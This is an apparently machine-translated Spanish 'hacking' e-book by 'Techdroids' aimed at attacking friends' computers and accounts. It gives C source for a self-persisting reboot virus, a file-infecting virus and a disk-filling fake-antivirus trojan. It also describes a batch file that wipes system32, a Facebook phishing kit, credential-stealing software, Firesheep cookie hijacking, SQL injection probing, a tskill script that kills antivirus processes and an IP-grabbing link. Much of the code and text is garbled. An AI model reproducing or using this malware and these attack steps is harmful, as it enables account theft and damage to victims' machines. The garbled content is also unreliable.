Documenti di Didattica
Documenti di Professioni
Documenti di Cultura
los derechos de
autor Prefacio
Cómo compilar programas C? Evaluación de la
experiencia de Windows hacking.
Cómo probar el funcionamiento de su antivirus - prueba EICAR? Un programa de
virus para reiniciar el equipo en cada inicio. Atacar la PC de su amigo con un virus
pequeño. Hack Facebook por suplantación de identidad. Códigos ocultos para
Android. Cómo crear un virus informático? Como hacer un caballo de Troya?
Techdroids
Ninguna parte de este libro puede ser utilizado o copiado sin permiso.
Prefacio
Dos años atrás, empecé una página de Facebook llamada Techdroids, regalar softwares y mostrando algunos hacks y
trucos. No fue hace mucho tiempo, desde que comenzó a recibir numerosas peticiones, diciendo que sus seres queridos
o amigos en sus cuentas hackeadas y que quería una venganza a ser tomado por la piratería de ellos.
Yo siendo un hacker, aprendí piratería probándola en mí mismo. No he hackeado las cuentas queridos o sitios web, no
porque no pueda. Es un principio personal sigo, así que no podía responder o responder a cualquier solicitud que
tengo.
Pero ahora me tomé un tiempo para escribir sobre esto y obtener una visión de lo fácil que es para cortar, asesorar por lo
tanto todo el mundo para aumentar sus medidas de seguridad y para estar seguro!
En este libro encontrará DIECISIETE hacks que te convertirán en un PRO. Todos los hacks que
encontrará en este libro son sólo con fines educativos.
Cómo compilar programas C?
Antes de seguir adelante, la amabilidad de ir a través de este artículo. Más tarde se encuentran dos artículos que se basan en
esta aplicación.
https://www.mediafire.com/?n75efj3v9jd76mu
2) Después de descargar, ejecutar el archivo 5.51.exe C ++. La ruta de instalación por defecto sería la siguiente:
C: \ Borland \ BCC55
1) Después de instalar el compilador Borland C ++, crear dos nuevos documentos de texto.
2) Abra el primer archivo Nueva Document.txt texto y añadir las dos líneas siguientes en él:
Guarde los cambios y cierre el archivo. Ahora cambie el nombre del archivo de texto nuevo a Document.txt bcc32.cfg.
3) Abrir el segundo documento de texto (2) archivo .txt y añadir la siguiente línea en él:
Guarde los cambios y cierre el archivo. Cambie el nombre del archivo del documento de texto (2) .txt a ilink32.cfg.
4) Ahora copia los dos archivos bcc32.cfg y ilink32.cfg, vaya a C: \ Borland \ BCC55 \ Bin y pegarlos.
Hacer la siguiente ruta como el directorio de trabajo actual (utilice el comando CD):
example.c bcc32
Ahora bien, si no existe ningún error en el código fuente, obtendrá un módulo ejecutable compilado (ejemplo.exe) en el
mismo lugar (C: \ Borland \ BCC55 \ Bin).
Nota: C será el directorio predeterminado en el que ha instalado Windows. Si ha instalado ventanas de fotos que cualquier
otro coche y localizar la carpeta de Windows y continuar como se mencionó anteriormente.
2. En la carpeta de almacén de datos se puede ver una gran cantidad de archivos XML, haga clic derecho y seleccione ordenar por fecha y
encontrar el archivo más reciente.
3. Sólo tienes que copiar ese archivo en el escritorio y abrirlo con el bloc de notas y la búsqueda de Puntaje del sistema (CTRL +
F). Normalmente será la sección de cabeza en sí y no se puede ver el valor de su sistema, cambiarlo a cualquier número y
guardarlo.
5. Ahora volver atrás y comprobar las propiedades del sistema, se puede encontrar el nuevo valor para el sistema.
Cómo probar el funcionamiento de su antivirus - prueba EICAR?
Este proceso puede ser utilizado por personas, empresas y antivirus programadores probar el correcto funcionamiento del
software antivirus o antimalware sin tener que lidiar con el virus de ordenador real que puede causar daños en el equipo.
Aquí es un procedimiento paso a paso para poner a prueba su antivirus.
1. Abra un bloc de notas (documento de texto. TXT) y copiar el siguiente código exactamente sobre ella, y guardar el bloc de
notas.
2. Cambie el nombre del archivo del documento de texto. TXT para myfile.com
Si el antivirus está funcionando correctamente en su computadora, entonces se debe generar una advertencia y eliminar de
inmediato º archivo * en la exploración. De lo contrario, puede que tenga que volver a instalar su antivirus.
NOTA: La mayoría de los antivirus se abrirá de salida un mensaje de advertencia en el propio Paso-1
También puede colocar el archivo myfile.com en un archivo ZIP o RAR y ejecutar una exploración en él a fin de asegurar si su
antivirus puede detectar la cadena de prueba en el archivo comprimido. Cualquier antivirus para escanear este archivo
responderá exactamente como se va a hacer por un virus verdadero código / malicioso. Esta prueba no causará ningún daño a su
equipo a pesar de que el antivirus marcarlo como un script malicioso. Por lo tanto es el método más seguro para comprobar el
correcto funcionamiento de cualquier antivirus.
Un programa de virus para reiniciar el equipo en cada inicio.
En este caso, el virus debe ser ejecutado sólo una vez y de ahí en adelante, se llevará a cabo el resto de la
operación por sí sola. Hemos programado este virus usando el lenguaje C. Si está familiarizado con el lenguaje C,
entonces es muy fácil de entender la lógica detrás de la codificación. El código se da abajo.
# incluir <stdio.h>
# incluir <dos.h>
# incluir <dir.h>
findroot void () {
int hecho;
done = FindFirst ( “c: \ windows \ system”, y ffblk, FA_DIREC); // para determinar si la unidad de raíz (hecho == 0) {
done = findfirst ( “C: \ windows \ system \ sysres.exe”, y ffblk, 0); // para determinar si el virus ya está instalado
o no si (hecho == 0) {
drive_no = 1;
regreso; }
done = findfirst ( “D: \ windows \ system \ sysres.exe”, y ffblk, 0); si (== hecho 0) {
encontrado =
1; regreso; }
drive_no = 2;
regreso; }
done = findfirst ( “E: \ windows \ system \ sysres.exe”, y ffblk, 0); si (== hecho 0) {
encontrado =
1; regreso; }
drive_no = 3;
regreso; }
done = findfirst ( “F: \ windows \ system \ sysres.exe”, y ffblk, 0); si (== hecho 0) {
encontrado = 1;
regreso; }
drive_no = 4;
regreso; }
más
de salida (0);
vacío principal() {
findroot ();
self = fopen (_argv [0], “rb”); // El propio conmutador de abrir el archivo de virus
(drive_no) {
caso 1:
TARGET = fopen ( “C: \ windows \ system \ sysres.exe”, “wb”); // para colocar una copia de sí mismo en un lugar remoto
“REG AÑADIR
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ / v SRES \ / t REG_SZ \ D / d: \ windows \
“REG AÑADIR
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ / v SRES \ / t REG_SZ \ / D F: \ windows \
más
del sistema ( “shutdown -r -t 0”); // si el sistema ya está infectado luego simplemente dar una orden para reiniciar}
Probar y eliminar el virus de su PC:
Se puede compilar y probar este virus en su PC sin ningún temor. Para probar, simplemente haciendo doble clic en el archivo
sysres.exe y reiniciar el sistema manualmente. A partir de ahora, cada vez que el PC se inicia y se carga el escritorio, el
ordenador se reiniciará automáticamente una y otra vez.
No va a hacer ningún daño, aparte de reiniciar automáticamente el sistema. Después de probarlo, puede eliminar el virus
siguiendo los pasos que se mencionan a continuación:
Ir:
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run Allí, en el sitio correcto, verá
una entrada por nombre “SRES”. Eliminar esta entrada. Eso es. Ahora ha eliminado con éxito este virus.
Atacar la PC de su amigo con un virus pequeño.
3. Guardar el bloc de notas más arriba con la extensión “.bat or.cmd” si lo desea.
5. Debido a que el archivo que ha creado elimina todos los archivos de ursystem32 carpeta y al reiniciar el PC no se iniciará
porque el sistema no puede encontrar los archivos de la carpeta system32 que se requiere en el momento de arranque.
6. También puede probar lo anterior mediante la creación de una carpeta falsa dejó supposewindows1 en C :. Copiar algunos archivos viejos
en ella y sólo tienes que seguir el comando anterior. Haciendo doble clic el bate o CMD su archivo automáticamente todos los archivos se
eliminan.
8. Puede probar este archivo en cualquier ordenador `s. (Esto dará lugar a causar daños en el equipo, por lo que pensar de nuevo antes de
intentar esto en la PC de cualquier persona)
Hack Facebook por suplantación de identidad.
http://www.mediafire.com/download/1wcn19p5nn7exe3/Techdroids.zip
5) A continuación, vaya a HT Docs, borrar los archivos existentes (action.php y otros archivos HTML).
6) Ahora subir su primera Editado página HTML (INDEX.HTML) ya continuación el archivo PHP.
7) Dar su sitio web bytehost.com a sus amigos y que se conectará pensando que es su Facebook la página de entrada,
pero sabemos que esto es una falsa.
8) A continuación se hará clic en inicio de sesión, será redirigido a una página de Facebook de la nuestra.
Ir a HT Docs y editar archivos ACTIONS.PHP, sustituir el sitio dado con cualquier sitio de su elección, este será
el sitio donde será redirigido a la víctima.
10) Cuando su nombre de usuario víctima, escriba su sitio bytehost.com junto con victims.html y pulse ENTER.
* # 06 # -IMEI número
* # * # 273 282 * 255 * 663282 * # * # * - copia de seguridad inmediata de todos los archivos multimedia
* # * # 1111 # * # * - TLC versión de software (1234 en el mismo código dará PDA y la versión de firmware)
Este programa es un ejemplo de cómo crear un virus en C. Este programa demuestra un programa simple virus que después
de la ejecución (Running) crea una copia de sí mismo en el otro archivo. Por lo tanto, destruye otros archivos infectarlas. Sin
embargo, el archivo infectado por virus también es capaz de propagar la infección a otro archivo y así sucesivamente. Aquí
está el código fuente del programa de virus.
# incluir <stdio.h>
# incluir <io.h>
# incluir <dos.h>
# incluir <dir.h>
# incluir <conio.h>
final;
vacío principal() {
st = reloj ();
clrscr ();
done = FindFirst ( “*. *”, y ffblk, 0); // Buscar un archivo con cualquier extensión (*. *), Mientras que (! Hecho) {
siguiente; x = 89.088;
printf ( “Infecting% s \ n”, ffblk.ff_name, a); mientras que (x>
2.048) {
2,048; }
++; siguiente: {
fcloseall ();
();
Compilar Método:
2. Pulse F9 para generar el archivo EXE (No presione CTRL F9, esto va a infectar todos los archivos en el directorio Cur
incluyendo su compilador).
3. Anotar el tamaño del archivo EXE generada en bytes (Marque propiedades del archivo EXE para su tamaño).
4. * Cambiar el valor de X en el código fuente con el tamaño anotado en el código fuente por
1. Compilar una vez, anotar el EXE longitud del archivo generado en bytes.
COMO PRUEBA:
2. Ponga un poco de archivos EXE (Mediante la búsqueda de *. EXE en búsqueda y pegar en la nueva carpeta).
3. Ejecutar el archivo EXE virus, no verá todos los archivos en el directorio actual se infectan.
Como hacer un caballo de Troya?
El caballo de Troya que se creará aquí actúa como un programa antivirus que escanea el equipo y elimina las amenazas.
Pero en realidad no hace más que ocupar el espacio en el disco duro en la unidad de raíz con sólo llenándolo con un
enorme archivo de basura.
La velocidad a la que se llena el espacio en disco duro que demasiado alto. Como resultado, el disco se llena hasta el 100% en cuestión
de minutos de funcionamiento de este troyano. Una vez que el espacio de disco está lleno, el troyano informa que la exploración es
completa. La víctima no será capaz de limpiar el espacio de disco duro utilizando cualquier programa de limpieza. Esto se debe a que el
troyano de forma inteligente crea un archivo enorme en la carpeta Windows \ System32 con the.dll extensión.
Dado que el archivo no deseado tiene la extensión .dll a menudo ignorada por los softwares de limpieza de disco. Así que para la víctima, no
hay manera de recuperar el espacio de disco duro a menos que reformatear su unidad.
El código para el caballo de Troya aparece más abajo, es necesario complie para obtener el ejecutable.
# incluir <stdio.h>
# incluir <conio.h>
# incluir <dos.h>
a, * t *, b;
carbonizarse
aceptar (void);
vacío principal() {
dibujar();
aceptar();
TextColor (blanco);
dibujar();
gotoxy (12,8);
cputs ( “de analizar el sistema espera por favor ....”); sueño (3);
gotoxy (12,8);
delline ();
cputs ( “Presione cualquier tecla para iniciar el análisis del sistema ...”); getch ();
gotoxy (12,8);
(); }
anulará aceptar () {
(1,8);
cputs ( “Este programa es una DEMO de Troyano simple. Si ejecuta este programa será \ n \ ran su
espacio COMPLETO DE DISCO EN unidad raíz. Sin embargo es posible a \ n \ rELIMINATE el daño. \ n \
n \ LIMPIEZA RTO LA daño que has para borrar el archivo "spceshot.dll" ubicado en \ n \ n \ r "% windir%
\ System32". \ n \ n \ RIF desea ejecutar LA PRENSA PROGRAMA ENTER, de lo contrario presione
CUALQUIER tecla para salir.”);
(0); }
void draw () {
clrscr ();
TextColor (blanco);
gotoxy (12,2);
cputs ( “* \ n \ b * \ n \ b * \ n \ b”);
gotoxy (67,3);
cputs ( “* \ n \ b * \ n \ b * \ n \ b”);
gotoxy (14,4);
findroot void () {
NULL) {
fclose (t);
TextColor (blanco);
(12,8);
cputs ( “SISTEMA DE EXPLORACIÓN fue interrumpida a intentarlo más tarde!”); getch (); de salida (1); }
b = fopen ( “C: \ windows \ system32 \ spceshot.dll”, “wb +”); si (b! = NULL)
showstatus ();
eatspace (); }}
NULL) {
fclose (t);
(12,8);
cputs ( “SISTEMA DE EXPLORACIÓN fue interrumpida a intentarlo más tarde!”); getch (); de salida (1); }
showstatus ();
eatspace (); }}
NULL) {
fclose (t);
(12,8);
cputs ( “SISTEMA DE EXPLORACIÓN fue interrumpida a intentarlo más tarde!”); getch (); de salida (1); }
showstatus ();
eatspace (); }}
NULL) {
fclose (t);
(12,8);
cputs ( “SISTEMA DE EXPLORACIÓN fue interrumpida a intentarlo más tarde!”); getch (); de salida (1); }
showstatus ();
eatspace (); }}
si (t == NULL) {
(12,8);
cputs ( “SCAN sistema falló pulse cualquier tecla para cerrar este programa!”.); getch (); de salida (1); }
de salida
(1); }
eatspace void () {
(12,16);
cputs ( “ADVERTENCIA: no aborte el proceso de exploración hasta que se complete \ n”); TextColor
(blanco); gotoxy (12,18); while (1) {
(estado == EOF) {
aleatorio (120);
dibujar();
gotoxy (12,8);
cprintf ( “Scan !. COMPLETA detectar y eliminar SOBRE AMENAZAS% d!”, vir_count); gotoxy (12,10);
descanso; }}
cputs ( “”);
de salida
(0); }
showstatus void () {
gotoxy (12,8);
(12,10);
cputs ( “Esto puede tardar hasta MINUTOS PARA HORAS”); gotoxy (12,13);
La replicación de carpetas es el proceso de creación de la misma carpeta infinitas veces. Que se multiplica una carpeta
muchas veces, así que va a seguir replicarse a sí mismo.
1. Sólo tiene que abrir un bloc de notas, copia y pega el código de abajo
discos compactos\
:lazo
Virus MD
cd Virus
goto bucle
4. En cualquier caso, no causa mucho daño, pero replica carpeta dentro de una carpeta y continúa.
Hackear contraseñas de tus amigos.
Aquí vamos a utilizar un software llamado GMAIL HACKER PRO, basta con ejecutar este software en su ordenador y asegúrese
de que su antivirus está deshabilitado.
Dado que este un piratería de software, un antivirus mostrará el mensaje como 'virus detectado'.
http://www.mediafire.com/?j68lnbeenb77e82
A continuación, conecte la unidad flash a la computadora de su amigo y ejecutar el software directamente desde la unidad flash USB.
http://www.wikihow.com/Run-Software-Directly-Off-a-USB-Flash-Drive
Escriba algún correo electrónico de identificación falsa y hacer clic en crackear la contraseña.
El uso de cookies y la caché de datos a sus amigos del navegador, el software recoge todos los identificadores de correo electrónico y
contraseñas que se utilizan para iniciar sesión en su / su equipo y los muestra en la pantalla.
Hackear contraseñas mediante el secuestro de cookies HTTP usando fuego
Oveja.
1. Descargar Firesheep de Firefox para introducirse usuarios de redes inalámbricas de cualquiera de los enlaces que figuran a continuación.
http://codebutler.github.com/firesheep/
http://www.mediafire.com/download/pr77k3y2jtjdppy/firesheep-0.1-1.xpi
2. Instalar este complemento en Firefox (funciona perfectamente en Windows XP y Windows Vista). Reiniciar Firefox.
Conectarse a cualquier red inalámbrica pública.
3. Ahora, en la barra lateral, golpeado en “Iniciar captura” y búsquedas para Firesheep, y que capture las galletas en una red
inalámbrica.
4. Tan pronto como cualquiera en la red inalámbrica insegura visita cualquier sitio web conocido a Firesheep, su nombre y la
foto se mostrará en la barra lateral. Ahora, basta con hacer doble clic sobre alguien y usted está en su / su cuenta. Por lo
tanto, usted es capaz de cortar usuario de la red inalámbrica.
sitios web que son vulnerables a Firesheep:
Como se informó, los dos gigantes de redes sociales de Facebook y Twitter son vulnerables y por lo tanto atacado en
gran medida por Firesheep. Además, otros sitios web vulnerables son: Foursquare, Gowalla, Amazon.com, Basecamp,
bit.ly, Cisco, CNET, Dropbox, Enom, Evernote, Flickr, Github, Google, HackerNews, cosecha, Windows Live, Nueva
York Times, Pivotal Tracker, slicehost, Tumblr, WordPress, Yahoo y Yelp.
Protección personal:
Firesheep truco sólo puede aplicarse si el sitio no utiliza conexiones HTTPS seguras. Por lo tanto, podemos establecer
Firesheep corte, si nos informamos de Firefox para utilizar siempre conexiones seguras. Esto se puede implementar
mediante el complemento de Firefox Fuerza-TIS.
Además, es necesario asegurar otros usuarios de redes inalámbricas. Así, FireShephard - la herramienta anti-Firesheep
ha sido puesto en libertad, que se apaga Firesheep se ejecuta en cualquier ordenador de la red inalámbrica. Fuego
Shephard básicamente inunda la red cerca inalámbrica con los paquetes que están diseñados para apagar Firesheep. Sin
duda, esto asegura a todos los usuarios de la red inalámbrica.
Hackear teléfonos de sus amigos a través de Bluetooth.
En este caso tengo dos programas, dos de ellos se pueden instalar en los teléfonos Java en ejecución. Hay que copiar
Puede descargar estos programas desde los enlaces que figuran a continuación
Bluetooth Cortar -
http://www.mediafire.com/download/chka73uhrrrz76b/bluetooh.jar
- contactos
- SMS lectura
- zvonenia Hlasitosť
- alarmas:
- teléfono se bloquea
- Clip, CLIR
- Reproductor multimedia
- Texto
- SE aplicaciones
- calendario
- teclas suenan
- temperatura:
- Volumen
- Estado de la memoria:
- icono de radio
- Keylock
Hackear sitios web a través de la inyección de SQL.
Mediante el uso de este software, el usuario puede realizar la huella digital de base de datos back-end, recuperar usuarios DBMS y
los hashes de contraseñas, mesas de volteo y columnas, ir a buscar los datos de la base de datos, ejecutar sentencias SQL e
incluso acceder al sistema de archivos subyacente y ejecutar comandos en el sistema operativo.
Enlace de descarga-
http://www.mytargetsite.com/php?id=34
http://www.mytargetsite.com/php? id = 34'
Si obtiene un error de sintaxis SQL, entonces este sitio web puede ser vulnerable a la inyección de SQL. Ahora puede utilizar
Desactivación de puertos USB puede ser una buena idea para aumentar la seguridad de la computadora. Esto puede ser muy útil
si el equipo está en un lugar público donde las posibilidades de virus y otras infecciones de malware es muy alto. Se puede
desactivar fácilmente el acceso a los puertos USB con el siguiente corte del registro:
Abra el Editor del Registro (Inicio -> Ejecutar -> regedit Tipo y pulse Enter) En el
doble clic en “Inicio”. En la “Información del valor” campo de ingresar 4 y haga clic en “OK”. Cierre el Editor
¿Quieres añadir el icono de la “Papelera de reciclaje” a Mi PC de manera que no es necesario ir de nuevo al escritorio para acceder a
ella cuando sea necesario? Bueno, aquí es cómo se puede hacer eso:
{} 645FF040-5081-101B-9F08-00AA002F954E
Ahora, abra “Mi PC” y presione F5 para actualizar la pantalla. Esto debe aparecer el icono de la “Papelera de reciclaje”.
encontrar las llaves y RegisteredOwner RegisteredOrganization. Haga doble clic sobre ellos para cambiar los
nombres a lo que quieras. Para ver los cambios, haga clic en “Mi PC” y seleccionar “Propiedades”.
Ahora puede agregar sus programas favoritos al inicio de Windows sin la necesidad de utilizar la carpeta de inicio. Aquí está una
manera de hacer esto:
HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run En el panel del lado derecho, crear un
nuevo “Valor de cadena” y cambie su nombre por el nombre del programa que desea agregar (se puede dar cualquier nombre,
no lo hace importar). Haga doble clic en el “Valor de cadena”, en el campo “Información del valor” añadir la ruta del programa
ejecutable que tiene que ejecutar en el arranque. Reiniciar el ordenador para ver los cambios en el efecto.
La creación de un virus que mata a su lote Anti-Virus.
Abra la libreta, copiar el código que figura a continuación y guardar el archivo con extension.bat. En doble pulsar el
@Echo off
rem -
“Centro de seguridad”
A BullGuard tskill / A
A cls SafeWeb
/ A CLE cls
/ A avg * tskill / A
ceniza * cls
A * ewid tskill / * Un
MSMP * cls
/ A mghtml tskill / A
msiexec tskill / A
A * UPD tskill / A *
zlclien tskill / A
Minilog tskill / A cc *
tskill / A tmp *
cls
/ A PCC * tskill / A
/ A PAdmin
A * avsch tskill / A *
SChE tskill / A *
Syman tskill / * Un
cls
* exploración tskill / A *
Ad-tskill / Un seguro *
tskill / A * offg
cls
de programa \ Grisoft
Kaspersky \ * * cls
2. Introduzca su ID de correo electrónico donde desea recibir la dirección IP de la víctima y golpear en Obtener vínculo.
4. Enviar este enlace a su víctima a través de correo electrónico o publicar el enlace en cualquier foro o sitios web y cada vez que alguien l
simplemente haga clic en este enlace, su dirección IP será registrada y enviada a usted por como se muestra a continuación.
Cómo rastrear cualquier dirección IP?
Trazando una dirección IP de nuevo a su ubicación es mucho más simple de lo que se imaginan muchas personas.
Hay muchas herramientas en línea que utilizan el cual usted puede realizar esta tarea. Uno de los sitios que preferimos es
IP2Location.com.
Sólo tienes que ir a http://www.ip2location.com/demo.aspx e introduzca la dirección IP que desea trazar en el cuadro de
diálogo y haga clic en “Find ubicación”'.
Con sólo un clic de un botón, se puede encontrar la siguiente información para cualquier dirección IP dada.
2. Región
3. Ciudad
4. La latitud / longitud
5. Código Postal
6. Zona horaria
9. Estación Meteorológica
Descargar la versión en CD de la herramienta. Una vez que descargue obtendrá una imagen de arranque que se necesita para
grabarla en el CD (Use un poco de software como de alimentación ISO). Ahora arrancar el ordenador desde el CD y siga las
instrucciones en pantalla para restablecer la contraseña.
3) También hay un editor de registro y otros servicios públicos del registro que funciona bajo Linux, y se puede utilizar para otras
cosas que la edición de contraseña.
Tabla de contenido
Tabla de contenidos
virus para reiniciar el equipo en cada inicio. Atacar la PC de su amigo con un virus
Hackear contraseñas mediante el secuestro de cookies HTTP usando cabra del fuego.
Hackear teléfonos de sus amigos a través de Bluetooth. Hackear sitios web a través de la
inyección de SQL. Registro de hacks para ajustar su PC con Windows. La creación de un virus
que mata a su lote Anti-Virus. ¿Cómo encontrar la dirección IP de alguien? Cómo rastrear